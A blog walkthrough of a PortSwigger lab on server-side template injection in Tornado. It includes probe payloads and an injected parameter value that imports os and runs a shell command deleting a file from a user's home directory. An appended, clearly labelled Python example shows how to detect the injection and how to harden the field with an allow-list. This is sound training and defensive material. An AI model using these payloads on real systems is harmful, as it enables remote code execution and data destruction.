Portswigger Lab Solution — SSTI Code Context | Karthikeyan Nagaraj
Check out the Basics of SSTI in my previous post
Lab Description:
This lab is vulnerable to server-side template injection due to the way it unsafely uses a Tornado template. To solve the lab, review the Tornado documentation to discover how to execute arbitrary code, then delete the morale.txt file from Carlos's home directory. You can log in to your own account using the following credentials: wiener:peter
Analysis:
1. Log in to the account wiener:peter and post a comment. For example, I'm inserting {{5*5}} as the comment.
2. Check out My Account; we can see that there is a functionality called the Preferred name, which may be vulnerable.
3. Intercept the traffic through Burp and send it to Repeater — Ctrl+R
4. Let’s try to Inject Tornado’s Template Expressions.
The below syntax is used for Tornado:
{{someExpression}}
5. Let's test whether the expression is executing or not by sending the below payload in the parameter blog-post-author-display:
}}{%25+import+os+%25}{{+"+Working"
Reload the page. Make sure to turn off the proxy or turn Intercept off.
It’s Working : )
Some of the Payloads
{{7*7}} = 49
${7*7} = ${7*7}
{{foobar}} = Error
{{7*'7'}} = 7777777
6. As we know the syntax of Tornado's template and we also know that the expressions are executing, let's use Python code as a payload to delete morale.txt:
}}{%25+import+os+%25}{{os.system('rm%20/home/carlos/morale.txt')
Feel free to ask queries via LinkedIn and to buy me a coffee : )
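As an added example (not code from the original post or from the lab), the Python below shows the defender's view of this step: the form-encoded blog-post-author-display value only reveals the Tornado delimiters `{{`, `}}`, `{%`, `%}` after decoding, so a review rule must decode before matching, and a server that treats the parameter as an allow-listed key instead of template code is not exploitable this way. The field names user.name, user.first_name and user.nickname and the user record are assumptions.

```python
from urllib.parse import unquote_plus

# Tornado template delimiters: a display-field selector should never contain them.
TORNADO_DELIMITERS = ("{{", "}}", "{%", "%}")

# Constructed sample values of the blog-post-author-display parameter, exactly as
# they would sit form-encoded in the POST body seen in Burp Repeater.
SAMPLE_PARAMS = {
    "benign": "user.name",                                   # assumed legitimate value
    "probe": '}}{%25+import+os+%25}{{+"+Working"',            # the post's test payload
    "exploit": "}}{%25+import+os+%25}{{os.system('rm%20/home/carlos/morale.txt')",
}


def decode_param(raw: str) -> str:
    """Decode a form-encoded value the way the server does: '+' -> space, %XX -> byte."""
    return unquote_plus(raw)


def looks_like_template_injection(raw: str) -> bool:
    """Detection signal: the decoded parameter carries Tornado template delimiters.

    Decoding first matters because '%25' hides the '%' of '{%' in the raw request."""
    decoded = decode_param(raw)
    return any(d in decoded for d in TORNADO_DELIMITERS)


def flagged_samples() -> list:
    """Names of the constructed samples a log-review rule would flag."""
    return [name for name, raw in SAMPLE_PARAMS.items() if looks_like_template_injection(raw)]


# Hardened server side (assumed design): the client selects a key, the server looks up
# the value and hands it to the template as a variable, so input is never compiled as code.
ALLOWED_DISPLAY_FIELDS = {
    "user.name": "name",
    "user.first_name": "first_name",
    "user.nickname": "nickname",
}


def resolve_display_name(user: dict, field: str) -> str:
    """Map the submitted selector to a user attribute; reject anything outside the allow-list."""
    attr = ALLOWED_DISPLAY_FIELDS.get(field)
    if attr is None:
        raise ValueError(f"unsupported display field: {field!r}")
    return user[attr]


if __name__ == "__main__":
    for name, raw in SAMPLE_PARAMS.items():
        print(f"{name:8} decoded={decode_param(raw)!r} flagged={looks_like_template_injection(raw)}")
```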
Thank you for Reading!!
Happy Hunting ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng